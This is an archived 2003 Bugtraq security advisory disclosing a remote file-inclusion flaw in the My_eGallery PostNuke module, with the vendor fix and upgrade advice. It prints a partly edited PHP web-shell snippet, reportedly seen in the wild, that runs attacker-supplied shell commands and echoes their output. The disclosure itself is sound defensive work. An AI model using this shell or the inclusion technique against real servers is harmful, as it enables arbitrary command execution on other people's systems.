lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20031126203800.37A9E42F3B@maja.zesoi.fer.hr> Date: Thu, 27 Nov 2003 09:37:36 +1300 From: "Bojan Zdrnja" <Bojan.Zdrnja@....hr> To: <bugtraq@...urityfocus.com> Subject: Remote execution in My_eGallery Product: My_eGallery Versions affected: all <3.1.1.g Website: http://lottasophie.sourceforge.net/index.php 1. Introduction --------------- My_eGallery is a very nice PostNuke module, which allows users to create and manipulate their own galleries on the web, plus offers various additional features. For more information and a demonstration you can go to the Website above. 2. Exploit ---------- Any version of My_eGallery, prior to 3.1.1.g, is susceptible to this vulnerability. Certain php files have some parameters which are used in include functions not filtered. An intruder can craft PHP code on their Web site and supply parameter to My_eGallery so it actually includes malicious PHP code. The following code was captured as being used in the wild (edited intentionally): <? // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt ) if (isset($chdir)) @chdir($chdir); ob_start(); execute("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp"); $output = ob_get_contents(); ob_end_clean(); print_output(); ?> This allows execution of any command on the server with My_eGallery, under the privileges of the Web server (usually apache or httpd). 3. Solution ----------- Vendor was contacted and promptly replied. Fix is available at the vendor's site: http://lottasophie.sourceforge.net/modules.php?op=modload&name=Downloads&fil e=index&req=viewdownload&cid=5 As this was seen being exploited in the wild, users are urged to upgrade to the latest version as soon as possible. Regards, Bojan Zdrnja CISSP
Powered by blists - more mailing lists